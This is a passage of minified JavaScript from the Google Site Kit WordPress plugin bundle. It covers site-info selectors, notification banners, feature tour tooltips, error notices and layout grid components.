info.");const{adminURL:e,ampMode:t,homeURL:o,proxyPermissionsURL:s,proxySetupURL:n,referenceSiteURL:r,setupErrorCode:a,setupErrorMessage:g,setupErrorRedoURL:d,siteName:u,siteLocale:p,timezone:m,startOfWeek:I,usingProxy:y,webStoriesActive:h,proxySupportLinkURL:f,widgetsAdminURL:k,postTypes:j,wpVersion:v,updateCoreURL:S,changePluginAutoUpdatesCapacity:b,siteKitAutoUpdatesEnabled:N,pluginBasename:A,productPostType:C,keyMetricsSetupCompletedBy:x,keyMetricsSetupNew:D,consentModeRegions:T,anyoneCanRegister:w,isMultisite:_}=i.g._googlesitekitBaseData,{currentEntityID:E,currentEntityTitle:R,currentEntityType:L,currentEntityURL:P}=i.g._googlesitekitEntityData;yield M.receiveSiteInfo({adminURL:e,ampMode:t,currentEntityID:E,currentEntityTitle:R,currentEntityType:L,currentEntityURL:P,homeURL:o,proxyPermissionsURL:s,proxySetupURL:n,referenceSiteURL:r,setupErrorCode:a,setupErrorMessage:g,setupErrorRedoURL:d,siteName:u,siteLocale:p,timezone:m,startOfWeek:I,postTypes:j,usingProxy:!!y,webStoriesActive:h,proxySupportLinkURL:f,widgetsAdminURL:k,wpVersion:v,updateCoreURL:S,changePluginAutoUpdatesCapacity:b,siteKitAutoUpdatesEnabled:N,pluginBasename:A,productPostType:C,keyMetricsSetupCompletedBy:x,keyMetricsSetupNew:D,consentModeRegions:T,anyoneCanRegister:w,isMultisite:_})}},S={getSiteInfo:e=>e.siteInfo,getAdminURL:(0,l.createRegistrySelector)(e=>(t,i,o={})=>{const{adminURL:s}=e(c.O4).getSiteInfo()||{};if(void 0===s||void 0===i)return s;const a="/"===s[s.length-1]?s:`${s}/`;let l=i,g="admin.php";if(-1!==i.indexOf(".php?")){const e=i.split("?");if(l=n.parse(e.pop()).page,!l)return s;g=e.shift()}const{page:d,...u}=o;return(0,r.F)(`${a}${g}`,{page:l,...u})}),getAMPMode:u("ampMode"),getCurrentEntityID:u("currentEntityID"),getCurrentEntityTitle:u("currentEntityTitle"),getCurrentEntityType:u("currentEntityType"),getCurrentEntityURL:u("currentEntityURL"),getHomeURL:u("homeURL"),getReferenceSiteURL:u("referenceSiteURL"),getProxySetupURL:u("proxySetupURL"),getProxyPermissionsURL:u("proxyPermissionsURL"),getCurrentReferenceURL:(0,l.createRegistrySelector)(e=>()=>{const t=e(c.O4).getCurrentEntityURL();return null!==t?t:e(c.O4).getReferenceSiteURL()}),isAMP:(0,l.createRegistrySelector)(e=>()=>{const t=e(c.O4).getAMPMode();if(void 0!==t)return!!t}),isPrimaryAMP:(0,l.createRegistrySelector)(e=>()=>{const t=e(c.O4).getAMPMode();if(void 0!==t)return t===c.qc}),isSecondaryAMP:(0,l.createRegistrySelector)(e=>()=>{const t=e(c.O4).getAMPMode();if(void 0!==t)return t===c.OQ}),getAdminSettingsURL:(0,l.createRegistrySelector)(e=>()=>{const t=e(c.O4).getAdminURL(),i=e(c.O4).isMultisite();if(void 0!==t&&void 0!==i)return new URL(!0===i?"network/settings.php":"options-general.php",t).href}),getTimezone:u("timezone"),getStartOfWeek:u("startOfWeek"),isUsingProxy:u("usingProxy"),getSiteName:u("siteName"),getSiteLocale:(0,l.createRegistrySelector)(e=>()=>e(c.O4).getSiteInfo()?.siteLocale?.replace("_","-")),getSetupErrorCode:u("setupErrorCode"),getSetupErrorMessage:u("setupErrorMessage"),getSetupErrorRedoURL:u("setupErrorRedoURL"),getProxySupportLinkURL:u("proxySupportLinkURL"),getWidgetsAdminURL:u("widgetsAdminURL"),getPostTypes:u("postTypes"),getPermaLinkParam:e=>{if(e.permaLink)return e.permaLink;const t=(0,a.d)(i.g.location.href,"permaLink");return t||!1},isWebStoriesActive:u("webStoriesActive"),isSiteURLMatch:(0,l.createRegistrySelector)(e=>(t,i)=>{const o=e(c.O4).getReferenceSiteURL();return(0,g.dc)(o)===(0,g.dc)(i)}),getSiteURLPermutations:(0,l.createRegistrySelector)(e=>()=>{const t=e(c.O4).getReferenceSiteURL(),i=[],o=new URL(t);return o.hostname=o.hostname.replace(/^www\./i,""),o.protocol="http",i.push((0,g.CZ)(o)),o.protocol="https",i.push((0,g.CZ)(o)),o.hostname="www."+o.hostname,i.push((0,g.CZ)(o)),o.protocol="http",i.push((0,g.CZ)(o)),i}),getWPVersion:u("wpVersion"),getUpdateCoreURL:u("updateCoreURL"),hasChangePluginAutoUpdatesCapacity:u("changePluginAutoUpdatesCapacity"),getSiteKitAutoUpdatesEnabled:u("siteKitAutoUpdatesEnabled"),getPluginBasename:u("pluginBasename"),getKeyMetricsSetupCompletedBy:u("keyMetricsSetupCompletedBy"),getKeyMetricsSetupNew:u("keyMetricsSetupNew"),hasMinimumWordPressVersion:(0,l.createRegistrySelector)(e=>(t,i)=>{s()(i,"minimumWPVersion is required.");const{major:o,minor:n}=e(c.O4).getWPVersion()||{};if(void 0===o||void 0===n)return;const[r,a=0]=i.split(".").map(e=>parseInt(e,10));return r<o||r===o&&a<=n}),getProductPostType:u("productPostType"),isKeyMetricsSetupCompleted:e=>d(d(S.getKeyMetricsSetupCompletedBy(e))),getConsentModeRegions:u("consentModeRegions"),getAnyoneCanRegister:u("anyoneCanRegister"),isMultisite:u("isMultisite")},b={initialState:f,actions:M,controls:k,reducer:j,resolvers:v,selectors:S}},68761:(e,t,i)=>{i.d(t,{A:()=>r});var o=i(63696),s=i(62659),n=i(6109);function r(e,t,{viewAction:i="view_notification",confirmAction:r="confirm_notification",dismissAction:a="dismiss_notification",clickLearnMoreAction:l="click_learn_more_link"}={}){const c=(0,s.A)(),g=null!=t?t:`${c}_${e}`;return{view:(0,o.useCallback)((...e)=>(0,n.sx)(g,i,...e),[g,i]),confirm:(0,o.useCallback)((...e)=>(0,n.sx)(g,r,...e),[g,r]),dismiss:(0,o.useCallback)((...e)=>(0,n.sx)(g,a,...e),[g,a]),clickLearnMore:(0,o.useCallback)((...e)=>(0,n.sx)(g,l,...e),[g,l])}}},70301:(e,t,i)=>{i.d(t,{M:()=>o});const o="core/location"},71189:(e,t,i)=>{i.d(t,{A:()=>CTAButton});var o=i(62688),s=i.n(o),n=i(49383),r=i(83366),a=i(62540);function CTAButton({label:e,ariaLabel:t,disabled:i,inProgress:o,onClick:s,href:l,external:c=!1,hideExternalIndicator:g=!1}){if(!e||!s&&!l)return null;let d;return c&&!g&&(d=(0,a.jsx)(r.A,{width:14,height:14})),(0,a.jsx)(n.SpinnerButton,{className:"googlesitekit-banner__cta","aria-label":t,disabled:i||o,isSaving:o,onClick:s,href:l,target:c?"_blank":void 0,trailingIcon:d,children:e})}CTAButton.propTypes={label:s().string,ariaLabel:s().string,disabled:s().bool,inProgress:s().bool,onClick:s().func,href:s().string,dismissOnClick:s().bool,dismissOptions:s().shape({expiresInSeconds:s().number,skipHidingFromQueue:s().bool})}},71264:(e,t,i)=>{i.d(t,{Ay:()=>TourTooltips,R0:()=>I,ei:()=>h});var o=i(15844),s=i(36703),n=i(62688),r=i.n(n),a=i(82871),l=i(50539),c=i(7972),g=i(97345),d=i(65054),u=i(83202),p=i(62659),m=i(62540);const I={options:{arrowColor:"#3c7251",backgroundColor:"#3c7251",overlayColor:"rgba(0, 0, 0, 0.6)",textColor:"#fff",zIndex:2e4},spotlight:{border:"2px solid #3c7251",backgroundColor:"#fff"}},y={back:(0,a.__)("Back","google-site-kit"),close:(0,a.__)("Close","google-site-kit"),last:(0,a.__)("Got it","google-site-kit"),next:(0,a.__)("Next","google-site-kit")},h={disableAnimation:!0,styles:{arrow:{length:8,margin:56,spread:16},floater:{filter:"drop-shadow(rgba(60, 64, 67, 0.3) 0px 1px 2px) drop-shadow(rgba(60, 64, 67, 0.15) 0px 2px 6px)"}}},f={VIEW:"feature_tooltip_view",NEXT:"feature_tooltip_advance",PREV:"feature_tooltip_return",DISMISS:"feature_tooltip_dismiss",COMPLETE:"feature_tooltip_complete"};function TourTooltips({steps:e,tourID:t,gaEventCategory:n,isRepeatable:r,callback:a}){const M=`${t}-step`,k=`${t}-run`,{setValue:j}=(0,l.useDispatch)(c.n),{dismissTour:v,receiveCurrentTour:S}=(0,l.useDispatch)(g.oR),b=(0,l.useRegistry)(),N=(0,p.A)(),A=(0,l.useSelect)(e=>e(c.n).getValue(M)||0),C=(0,l.useSelect)(e=>e(c.n).getValue(k)&&!1===e(g.oR).isTourDismissed(t));(0,o.A)(function(){i.g.document.body.classList.add("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${t}`),j(k,!0)});const x=e.map(e=>({disableBeacon:!0,isFixed:!0,placement:"auto",...e}));return(0,m.jsx)(s.Ay,{callback:function(e){!function({index:e,action:t,lifecycle:i,size:o,status:r,type:a}){const l=e+1,c="function"==typeof n?n(N):n;a===s.qY.TOOLTIP&&i===s.VD.TOOLTIP?(0,d.sx)(c,f.VIEW,l):t===s.kl.CLOSE&&i===s.VD.COMPLETE?(0,d.sx)(c,f.DISMISS,l):t===s.kl.NEXT&&r===s.XQ.FINISHED&&a===s.qY.TOUR_END&&o===l&&(0,d.sx)(c,f.COMPLETE,l),i===s.VD.COMPLETE&&r!==s.XQ.FINISHED&&(t===s.kl.PREV&&(0,d.sx)(c,f.PREV,l),t===s.kl.NEXT&&(0,d.sx)(c,f.NEXT,l))}(e);const{action:o,index:l,status:c,step:g,type:u}=e,p=o===s.kl.CLOSE,m=!p&&[s.qY.STEP_AFTER,s.qY.TARGET_NOT_FOUND].includes(u),I=[s.XQ.FINISHED,s.XQ.SKIPPED].includes(c),y=p&&u===s.qY.STEP_AFTER,h=I||y;if(s.qY.STEP_BEFORE===u){let e=g.target;"string"==typeof g.target&&(e=i.g.document.querySelector(g.target)),e?.scrollIntoView?.({block:"center"})}m?function(e,t){j(M,e+(t===s.kl.PREV?-1:1))}(l,o):h&&(i.g.document.body.classList.remove("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${t}`),r?(j(k,!1),j(M,null),S(null)):v(t)),a&&a(e,b)},floaterProps:h,locale:y,run:C,stepIndex:A,steps:x,styles:I,tooltipComponent:u.A,continuous:!0,disableOverlayClose:!0,disableScrolling:!0,showProgress:!0})}TourTooltips.propTypes={steps:r().arrayOf(r().object).isRequired,tourID:r().string.isRequired,gaEventCategory:r().oneOfType([r().string,r().func]).isRequired,isRepeatable:r().bool,callback:r().func}},72050:(e,t,i)=>{i.d(t,{A:()=>SetupCTA});var o=i(4452),s=i.n(o),n=i(62688),r=i.n(n),a=i(63696),l=i(50539),c=i(8732),g=i(68761),d=i(83891),u=i(41671),p=i(71189),m=i(61983),I=i(10740),y=i(49383),h=i(62540);function SetupCTA({notificationID:e,title:t,description:i,errorText:o,helpText:n,learnMoreLink:r,dismissButton:u,ctaButton:p,svg:m,footer:f,gaTrackingEventArgs:M,waitingProgress:k,...j}){const v=(0,g.A)(e,M?.category),{dismissNotification:S}=(0,l.useDispatch)(c.D);return(0,h.jsxs)(a.Fragment,{children:[!!k&&(0,h.jsx)(y.ProgressBar,{className:"googlesitekit-banner__progress-bar",...k}),(0,h.jsx)("div",{className:s()("googlesitekit-widget-context",{"googlesitekit-widget-context--with-progress-bar":!!k}),children:(0,h.jsx)(I.xA,{children:(0,h.jsx)(I.fI,{children:(0,h.jsx)(I.fh,{size:12,children:(0,h.jsx)(d.A,{className:"googlesitekit-banner--setup-cta",title:t,description:i,errorText:o,helpText:n,learnMoreLink:r&&{...r,onClick:async function(e){v.clickLearnMore(M?.label,M?.value),await(r?.onClick?.(e))}},dismissButton:u&&{...u,onClick:async function(t){await(u?.onClick?.(t)),v.dismiss(M?.label,M?.value),S(e,{...u?.dismissOptions})}},ctaButton:p&&{...p,onClick:async function(t){v.confirm(M?.label,M?.value),await(p?.onClick?.(t)),p?.dismissOnClick&&S(e,{...p?.dismissOptions})}},svg:m,footer:f,...j})})})})})]})}SetupCTA.propTypes={notificationID:r().string,title:r().string,description:r().oneOfType([r().string,r().node]),errorText:r().string,helpText:r().string,learnMoreLink:r().shape(u.A.propTypes),dismissButton:r().shape(m.A.propTypes),ctaButton:r().shape(p.A.propTypes),svg:r().shape({desktop:r().elementType,mobile:r().elementType,verticalPosition:r().oneOf(["top","center","bottom"])}),footer:r().node,gaTrackingEventArgs:r().shape({category:r().string,label:r().string,value:r().number}),waitingProgress:r().shape(y.ProgressBar.propTypes)}},72545:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,s=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 14 14"},e),o||(o=s.createElement("path",{fill:"currentColor",d:"M14 1.41 12.59 0 7 5.59 1.41 0 0 1.41 5.59 7 0 12.59 1.41 14 7 8.41 12.59 14 14 12.59 8.41 7z"})))},73198:(e,t,i)=>{i.d(t,{A:()=>ErrorNotice});var o=i(62688),s=i.n(o),n=i(63696),r=i(82871),a=i(84024),l=i(50539),c=i(13137),g=i(25797),d=i(6109),u=i(62540);function ErrorNotice({className:e,error:t,hasButton:i=!1,storeName:o,message:s=t.message,noPrefix:p=!1,skipRetryMessage:m,hideIcon:I=!1}){const y=(0,l.useDispatch)(),h=(0,l.useSelect)(e=>o?e(o).getSelectorDataForError(t):null),f=(0,n.useCallback)(()=>{y(h.storeName).invalidateResolution(h.name,h.args)},[y,h]);if(!s||(0,c.G)(t))return null;const M=i&&(0,c.vl)(t,h);let k=s;i||m||(k=(0,r.sprintf)(/* translators: %s: Error message from Google API. */ /* translators: %s: Error message from Google API. */ (0,r.__)("%s (Please try again.)","google-site-kit"),k)),p||(k=(0,r.sprintf)(/* translators: $%s: Error message */ /* translators: $%s: Error message */ (0,r.__)("Error: %s","google-site-kit"),k));const j=t?.data?.reconnectURL;j&&(0,a.m)(j)&&(k=(0,r.sprintf)(/* translators: 1: Original error message 2: Reconnect URL */ /* translators: 1: Original error message 2: Reconnect URL */ (0,r.__)('%1$s To fix this, <a href="%2$s">redo the plugin setup</a>.',"google-site-kit"),k,j));return(0,u.jsx)(g.A,{className:e,type:g.A.TYPES.ERROR,description:(0,u.jsx)("span",{dangerouslySetInnerHTML:(0,d.p9)(k,{ALLOWED_TAGS:["a"],ALLOWED_ATTR:["href"]})}),ctaButton:M?{label:(0,r.__)("Retry","google-site-kit"),onClick:f}:void 0,hideIcon:I})}ErrorNotice.propTypes={className:s().string,error:s().shape({message:s().string}),hasButton:s().bool,storeName:s().string,message:s().string,noPrefix:s().bool,skipRetryMessage:s().bool,hideIcon:s().bool}},73866:(e,t,i)=>{i.d(t,{g4:()=>I,o1:()=>m});var o=i(78913),s=i(32091),n=i.n(s),r=i(10523),a=i.n(r),l=i(6109),c=i(50539);const g="RECEIVE_ERROR",d="CLEAR_ERROR",u="CLEAR_ERRORS";function p(e,t){if(t&&Array.isArray(t)){const i=t.map(e=>"object"==typeof e?(0,l.Zm)(e):e);return`${e}::${a()(JSON.stringify(i))}`}return e}const m={receiveError:(e,t,i=[])=>(n()(e,"error is required."),n()(t,"baseName is required."),n()(i&&Array.isArray(i),"args must be an array."),{type:g,payload:{error:e,baseName:t,args:i}}),clearError:(e,t=[])=>(n()(e,"baseName is required."),n()(t&&Array.isArray(t),"args must be an array."),{type:d,payload:{baseName:e,args:t}}),clearErrors:e=>({type:u,payload:{baseName:e}})};function I(e){n()(e,"storeName must be defined.");const t=(0,c.createReducer)((e,{type:t,payload:i})=>{switch(t){case g:{const{baseName:t,args:o,error:s}=i,n=p(t,o);e.errors=e.errors||{},e.errorArgs=e.errorArgs||{},e.errors[n]=s,e.errorArgs[n]=o;break}case d:{const{baseName:t,args:o}=i,s=p(t,o);e.errors=e.errors||{},e.errorArgs=e.errorArgs||{},delete e.errors[s],delete e.errorArgs[s];break}case u:{const{baseName:t}=i;if(t){e.errors=e.errors||{},e.errorArgs=e.errorArgs||{};for(const i in e.errors)(i===t||i.startsWith(`${t}::`))&&(delete e.errors[i],delete e.errorArgs[i])}else e.errors={},e.errorArgs={};break}}}),i={getErrorForSelector:(e,t,o=[])=>(n()(t,"selectorName is required."),i.getError(e,t,o)),getErrorForAction:(e,t,o=[])=>(n()(t,"actionName is required."),i.getError(e,t,o)),getError(e,t,i){const{errors:o}=e;return n()(t,"baseName is required."),o[p(t,i)]},getErrors(e){const t=new Set(Object.values(e.errors));return Array.from(t)},getMetaDataForError(e,t){const i=Object.keys(e.errors).find(i=>e.errors[i]===t);if(i){return{baseName:i.substring(0,i.indexOf("::")),args:e.errorArgs[i]}}return null},getSelectorDataForError:(0,o.N)(t=>function(i,o){const s=t(e).getMetaDataForError(o);if(s){const{baseName:i,args:o}=s;if(!!t(e)[i])return{storeName:e,name:i,args:o}}return null}),hasErrors:e=>i.getErrors(e).length>0};return{initialState:{errors:{},errorArgs:{}},actions:m,controls:{},reducer:t,resolvers:{},selectors:i}}},74426:(e,t,i)=>{function o(e){return e.charAt(0).toUpperCase()+e.slice(1)}function s(e){return e.replace(/([a-z0-9]{1})([A-Z]{1})/g,"$1_$2").toUpperCase()}function n(e){return e.split("-").map(e=>e.charAt(0).toUpperCase()+e.slice(1)).join("")}i.d(t,{Uf:()=>n,m2:()=>o,sP:()=>s})},76984:(e,t,i)=>{i.d(t,{Q:()=>o});const o={NEW:"new",SUCCESS:"success",WARNING:"warning",INFO:"info",INFO_ALT:"info-alt",ERROR:"error"}},78014:(e,t,i)=>{i.d(t,{A:()=>StoreErrorNotices});var o=i(62688),s=i.n(o),n=i(50539),r=i(73198),a=i(88273),l=i(13137),c=i(31012),g=i(62540);function StoreErrorNotices({hasButton:e=!1,moduleSlug:t,storeName:i}){const o=(0,n.useSelect)(e=>e(i).getErrors()),s=(0,n.useSelect)(e=>e(a.i).getModule(t)),d=[];return o.filter(e=>!(!e?.message||d.includes(e.message))&&(d.push(e.message),!0)).map((t,o)=>{let{message:n}=t;return(0,l.SG)(t)&&(n=(0,c.c)(n,s)),(0,g.jsx)(r.A,{error:t,hasButton:e,storeName:i,message:n},o)})}StoreErrorNotices.propTypes={hasButton:s().bool,storeName:s().string.isRequired,moduleSlug:s().string}},79961:(e,t,i)=>{i.d(t,{A:()=>n});var o=i(63696),s=i(84895);const n=(0,o.createContext)(s.t)},81597:(e,t,i)=>{i.d(t,{I:()=>o});const o="ads"},82246:(e,t,i)=>{i.d(t,{A:()=>d});var o=i(62688),s=i.n(o),n=i(63696),r=i(81276),a=i(49383),l=i(59865),c=i(62540);let g=null;function RefocusableModalDialog({dialogActive:e=!1,refocusQuerySelector:t=null,...i}){const o=(0,n.useCallback)(()=>{setTimeout(()=>{const e=t?document.querySelector(t):g;e&&document.body.contains(e)&&e.focus(),t||(g=null)})},[t]),s=(0,r.A)(e);return(0,n.useEffect)(()=>(!0===s&&!1===e&&o(),()=>{o()}),[s,e,o]),(0,c.jsx)(l.A,{dialogActive:e,...i})}!function(){function e(e){const t=e.target.closest("button, a, input");t&&!t.classList.contains("mdc-dialog__cancel-button")&&(g=t)}void 0!==i.g&&i.g.document&&!i.g._googlesitekitModalFocusTrackerInitialized&&(i.g.document.addEventListener("mousedown",e),i.g.document.addEventListener("keydown",t=>{"Enter"!==t.key&&" "!==t.key||e(t)}),i.g._googlesitekitModalFocusTrackerInitialized=!0)}(),RefocusableModalDialog.propTypes={dialogActive:s().bool,refocusQuerySelector:s().string,...a.Dialog.propTypes};const d=RefocusableModalDialog},82871:e=>{e.exports=googlesitekit.i18n},83202:(e,t,i)=>{i.d(t,{A:()=>TourTooltip});var o=i(28056),s=i.n(o),n=i(4452),r=i.n(n),a=i(62688),l=i.n(a),c=i(82871),g=i(49383);var d=i(72545),u=i(33052),p=i(62540);function TourTooltip({backProps:e,closeProps:t,index:i,primaryProps:n,size:a,step:l,tooltipProps:m}){const I=a>1?function(e){return new Array(null!=e?e:0).fill().map((e,t)=>t)}(a):[];function y(e){return r()("googlesitekit-tooltip-indicator",{active:e===i})}return(0,p.jsx)("div",{className:r()("googlesitekit-tour-tooltip",l.className),...m,children:(0,p.jsxs)(s(),{className:"googlesitekit-tooltip-card",children:[(0,p.jsxs)("div",{className:"googlesitekit-tooltip-body",children:[(0,p.jsx)(u.A,{as:"h2",className:"googlesitekit-tooltip-title",size:"medium",type:"title",children:l.title}),(0,p.jsx)("div",{className:"googlesitekit-tooltip-content",children:l.content})]}),(0,p.jsxs)(o.CardActions,{className:"googlesitekit-tooltip-actions",children:[(0,p.jsx)("ul",{className:"googlesitekit-tooltip-indicators",children:I.map(e=>(0,p.jsx)("li",{className:y(e)},`indicator-${e}`))}),(0,p.jsxs)("div",{className:"googlesitekit-tooltip-buttons",children:[0!==i&&(0,p.jsx)(g.Button,{className:"googlesitekit-tooltip-button",text:!0,...e,children:e.title}),l.cta,n.title&&(0,p.jsx)(g.Button,{className:"googlesitekit-tooltip-button",text:!0,...n,children:n.title})]})]}),(0,p.jsx)(g.Button,{className:"googlesitekit-tooltip-close",icon:(0,p.jsx)(d.A,{width:"14",height:"14"}),onClick:t.onClick,"aria-label":(0,c.__)("Close","google-site-kit"),text:!0,hideTooltipTitle:!0})]})})}TourTooltip.propTypes={backProps:l().object.isRequired,closeProps:l().object.isRequired,index:l().number.isRequired,isLastStep:l().bool.isRequired,primaryProps:l().object.isRequired,size:l().number.isRequired,step:l().shape({content:l().node,title:l().node,cta:l().oneOfType([l().element,l().bool]),className:l().string}).isRequired,tooltipProps:l().object.isRequired}},83366:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,s=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),o||(o=s.createElement("path",{d:"M5 21a2 2 0 0 1-1.425-.575A2 2 0 0 1 3 19V5q0-.825.575-1.4Q4.175 3 5 3h7v2H5v14h14v-7h2v7q0 .825-.6 1.425Q19.825 21 19 21zm4.7-5.3-1.4-1.4L17.6 5H14V3h7v7h-2V6.4z"})))},83880:(e,t,i)=>{i.d(t,{A:()=>c});var o=i(62688),s=i.n(o),n=i(97513),r=i(33052),a=i(8513),l=i(62540);function c({type:e=a.SZ,size:t,children:i,...o}){const s=(0,n.dv)();return(0,l.jsx)(r.A,{as:"p",type:e,size:t||(s===n.mp?a.Kk:a.Yw),...o,children:i})}c.propTypes={type:s().oneOf(a.tT),size:s().oneOf(a.oJ)}},83891:(e,t,i)=>{i.d(t,{A:()=>y});var o=i(4452),s=i.n(o),n=i(62688),r=i.n(n),a=i(63696),l=i(97513),c=i(62540);function TitleIcon({className:e,children:t}){return(0,c.jsx)("div",{className:s()("googlesitekit-banner__title-icon",e),children:t})}function Title({className:e,children:t}){return(0,c.jsx)("p",{className:s()("googlesitekit-banner__title",e),children:t})}TitleIcon.propTypes={className:r().string,children:r().node},Title.propTypes={className:r().string,children:r().node};var g=i(6109),d=i(41671);function Description({className:e,description:t,learnMoreLink:i,additionalDescription:o,children:n}){return(0,c.jsxs)("div",{className:s()("googlesitekit-banner__description",e),children:[(0,a.isValidElement)(t)?t:"string"==typeof t?(0,c.jsx)("span",{dangerouslySetInnerHTML:(0,g.p9)(t,{ALLOWED_TAGS:["strong","em","br","a"],ALLOWED_ATTR:["href"]})}):t," ",i?.href&&(0,c.jsx)(d.A,{...i}),o&&(0,c.jsx)("div",{className:"googlesitekit-banner__additional-description",children:o}),n]})}function HelpText({className:e,children:t}){return(0,c.jsx)("p",{className:s()("googlesitekit-banner__help-text",e),children:t})}Description.propTypes={className:r().string,description:r().oneOfType([r().string,r().node]),learnMoreLink:r().shape(d.A.propTypes),additionalDescription:r().oneOfType([r().string,r().node]),children:r().node},HelpText.propTypes={className:r().string,children:r().node};var u=i(71189),p=i(61983);function Footer({className:e,children:t}){return(0,c.jsx)("div",{className:s()("googlesitekit-banner__footer",e),children:t})}Footer.propTypes={className:r().string,children:r().node};var m=i(25797);const I=(0,a.forwardRef)(({className:e,titleIcon:t,title:i,description:o,additionalDescription:n,errorText:r,helpText:a,learnMoreLink:g,dismissButton:d,ctaButton:I,svg:y,footer:h},f)=>{const M=(0,l.dv)(),k=M===l.mp||M===l.Lg;let j=null;k&&y?.mobile?j=y.mobile:!k&&y?.desktop&&(j=y.desktop);const v=y?.verticalPosition?y.verticalPosition:"center";return(0,c.jsxs)("div",{ref:f,className:s()("googlesitekit-banner",e),children:[(0,c.jsxs)("div",{className:"googlesitekit-banner__content",children:[t&&(0,c.jsx)(TitleIcon,{children:t}),(0,c.jsx)(Title,{children:i}),(0,c.jsx)(Description,{description:o,learnMoreLink:g,additionalDescription:n}),a&&(0,c.jsx)(HelpText,{children:a}),r&&(0,c.jsx)(m.A,{type:"error",description:r}),(0,c.jsxs)("div",{className:"googlesitekit-notice__action",children:[I&&(0,c.jsx)(u.A,{...I}),d?.onClick&&(0,c.jsx)(p.A,{...d})]})]}),j&&(0,c.jsx)("div",{className:s()("googlesitekit-banner__svg-wrapper",{[`googlesitekit-banner__svg-wrapper--${v}`]:v}),style:{backgroundImage:`url(${j})`}}),h&&(0,c.jsx)(Footer,{children:h})]})});I.propTypes={titleIcon:r().node,title:r().string,description:r().oneOfType([r().string,r().node]),additionalDescription:r().oneOfType([r().string,r().node]),errorText:r().string,helpText:r().string,learnMoreLink:r().shape(d.A.propTypes),dismissButton:r().shape(p.A.propTypes),ctaButton:r().shape(u.A.propTypes),svg:r().shape({desktop:r().elementType,mobile:r().elementType,verticalPosition:r().oneOf(["top","center","bottom"])}),footer:r().node};const y=I},84730:(e,t,i)=>{i.d(t,{FQ:()=>n,He:()=>a,bI:()=>r,rq:()=>s,ui:()=>o});const o="warning-notification-gtg",s="gtg-setup-cta",n={ERROR_HIGH:30,ERROR_LOW:60,WARNING:100,INFO:150,SETUP_CTA_HIGH:150,SETUP_CTA_LOW:200},r={HEADER:"notification-area-header",DASHBOARD_TOP:"notification-area-dashboard-top",OVERLAYS:"notification-area-overlays"},a={DEFAULT:"default",SETUP_CTAS:"setup-ctas"}},84895:(e,t,i)=>{i.d(t,{G:()=>s,t:()=>o});const o=new Set(i.g?._googlesitekitBaseData?.enabledFeatures||[]);function s(e,t=o){return t instanceof Set&&t.has(e)}},84984:(e,t,i)=>{i.d(t,{fh:()=>Cell,xA:()=>u,fI:()=>g});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(62540);function Cell(e){const{className:t,alignTop:i,alignMiddle:o,alignBottom:s,alignRight:n,alignLeft:l,smAlignRight:c,mdAlignRight:g,lgAlignRight:d,smSize:u,smStart:p,smOrder:m,mdSize:I,mdStart:y,mdOrder:h,lgSize:f,lgStart:M,lgOrder:k,size:j,children:v,...S}=e;return(0,a.jsx)("div",{...S,className:r()(t,"mdc-layout-grid__cell",{"mdc-layout-grid__cell--align-top":i,"mdc-layout-grid__cell--align-middle":o,"mdc-layout-grid__cell--align-bottom":s,"mdc-layout-grid__cell--align-right":n,"mdc-layout-grid__cell--align-left":l,"mdc-layout-grid__cell--align-right-phone":c,"mdc-layout-grid__cell--align-right-tablet":g,"mdc-layout-grid__cell--align-right-desktop":d,[`mdc-layout-grid__cell--span-${j}`]:12>=j&&j>0,[`mdc-layout-grid__cell--span-${f}-desktop`]:12>=f&&f>0,[`mdc-layout-grid__cell--start-${M}-desktop`]:12>=M&&M>0,[`mdc-layout-grid__cell--order-${k}-desktop`]:12>=k&&k>0,[`mdc-layout-grid__cell--span-${I}-tablet`]:8>=I&&I>0,[`mdc-layout-grid__cell--start-${y}-tablet`]:8>=y&&y>0,[`mdc-layout-grid__cell--order-${h}-tablet`]:8>=h&&h>0,[`mdc-layout-grid__cell--span-${u}-phone`]:4>=u&&u>0,[`mdc-layout-grid__cell--start-${p}-phone`]:4>=p&&p>0,[`mdc-layout-grid__cell--order-${m}-phone`]:4>=m&&m>0}),children:v})}Cell.propTypes={smSize:s().number,smStart:s().number,smOrder:s().number,mdSize:s().number,mdStart:s().number,mdOrder:s().number,lgSize:s().number,lgStart:s().number,lgOrder:s().number,size:s().number,alignTop:s().bool,alignMiddle:s().bool,alignBottom:s().bool,alignRight:s().bool,alignLeft:s().bool,smAlignRight:s().bool,mdAlignRight:s().bool,lgAlignRight:s().bool,className:s().string,children:s().node},Cell.defaultProps={className:"",size:0,smSize:0,smStart:0,smOrder:0,mdSize:0,mdStart:0,mdOrder:0,lgSize:0,lgStart:0,lgOrder:0};var l=i(63696);const c=(0,l.forwardRef)(({className:e,children:t,...i},o)=>(0,a.jsx)("div",{ref:o,className:r()("mdc-layout-grid__inner",e),...i,children:t}));c.displayName="Row",c.propTypes={className:s().string,children:s().node},c.defaultProps={className:""};const g=c,d=(0,l.forwardRef)(({alignLeft:e,fill:t,className:i,children:o,collapsed:s,...n},l)=>(0,a.jsx)("div",{className:r()("mdc-layout-grid",i,{"mdc-layout-grid--align-left":e,"mdc-layout-grid--collapsed":s,"mdc-layout-grid--fill":t}),...n,ref:l,children:o}));d.displayName="Grid",d.propTypes={alignLeft:s().bool,fill:s().bool,className:s().string,collapsed:s().bool,children:s().node},d.defaultProps={className:""};const u=d},85097:(e,t,i)=>{i.d(t,{W:()=>l});var o=i(79257),s=i(35470),n=i(63696),r=i(52735),a=i(7972);function l({sticky:e=!1}={}){const 